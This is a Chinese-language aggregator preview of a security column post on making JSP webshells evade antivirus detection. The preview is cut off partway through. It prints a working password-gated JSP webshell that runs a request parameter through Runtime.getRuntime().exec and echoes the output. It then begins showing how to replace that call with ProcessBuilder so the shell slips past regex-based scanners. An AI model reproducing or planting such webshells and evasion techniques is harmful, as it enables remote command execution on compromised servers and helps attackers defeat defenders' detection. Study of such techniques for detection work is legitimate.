专栏名称: 哈拉少安全小队
专注安全研究,漏洞复现,代码审计,python poc/exp脚本开发,经常更新一些最新的漏洞复现,漏洞分析文章,以及脱敏的实战文章。
今天看啥  ›  专栏  ›  哈拉少安全小队

关于一些常见的JSP_Webshell免杀小tips

哈拉少安全小队  · 公众号  ·  · 2024-08-26 11:51
    

文章预览

0 x 0 1 、 前 言 最近研究Java相关方面的安全,最后想着看看关于JSP相关的Webshell免杀思路,以下是本人自己对于jspwebshell的免杀思路分享给大家 0 x 02 、内置函数免杀/MimeLauncher+反射 正常的jsp马,直接通过GET参数调用Runtime中的exec方法进行命令执行,这里如果正则匹配到Runtime.getRuntime().exec则很容易被查杀 if ( "023" . equals (request.getParameter( "pwd" ))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter( "i" )).getInputStream();     int  a =  -1 ;  byte [] b =  new   byte [ 2048 ];  out .print( " " );     while ((a= in .read(b))!= -1 ){  out .println( new  String(b));      }        out .print( " "); } %  我们可以利用ProcessBuilder替换Runtime.getruntime().exec()因为他最终实际上也是调用的ProcessBuilder中的函数,直接使用ProcessBuilder则可以直接替换Runtime从而绕过正则表达式 String pentest = reques ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览